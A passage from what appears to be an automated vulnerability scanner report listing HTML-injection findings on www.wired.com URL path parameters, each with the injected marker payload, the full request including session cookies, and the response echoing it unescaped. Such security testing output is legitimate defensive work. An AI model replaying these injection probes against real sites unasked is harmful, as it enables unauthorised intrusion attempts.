Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29319
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:22:08 GMT
Date: Sun, 21 Nov 2010 23:12:08 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science266e8"><a>afe4e6938d ss_discoveries c_news">
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1030"><a>70ba086e197 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveriesb1030"><a>70ba086e197/news/2008/02/dayintech_0226 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:22:25 GMT
Date: Sun, 21 Nov 2010 23:12:25 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveriesb1030"><a>70ba086e197 c_news">
...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59c5e"><a>b29ca90e37a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveries/news59c5e"><a>b29ca90e37a/2008/02/dayintech_0226 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:22:37 GMT
Date: Sun, 21 Nov 2010 23:12:37 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science ss_discoveries c_news59c5e"><a>b29ca90e37a">
...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4cda9"><a>f470b0d8cd7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science4cda9"><a>f470b0d8cd7/discoveries/news/2008/03/dayintech_0321 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.1290369692.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|2674BD5005013C42-4000010B6000EA8D[CE]; s_sq=%5B%5BB%5D%5D; s_nr=1290369692237; __utma=238032518.1528376695.1290369692.1290369692.1290369692.1; mobify=0; __utmc=238032518; __utmb=238032518;
Response
HTTP/1.1 404 Not Found
Server: Apache/2.0.52 (Red Hat)
Content-Type: text/html; charset=UTF-8
Content-Length: 29321
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Sun, 21 Nov 2010 23:22:15 GMT
Date: Sun, 21 Nov 2010 23:12:15 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dt
...[SNIP]...
<body class="s_science4cda9"><a>f470b0d8cd7 ss_discoveries c_news">
...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff5b1"><a>73c8031883a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /science/discoveriesff5b1"><a>73c8031883a/news/2008/03/dayintech_0321 HTTP/1.1
Host: www.wired.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=cabeM2D0ZHHHU4YK1oWXs; s_cc=true; __unam=c1361f6-12c7006e158-7792a530-1; __utmz=238032518.129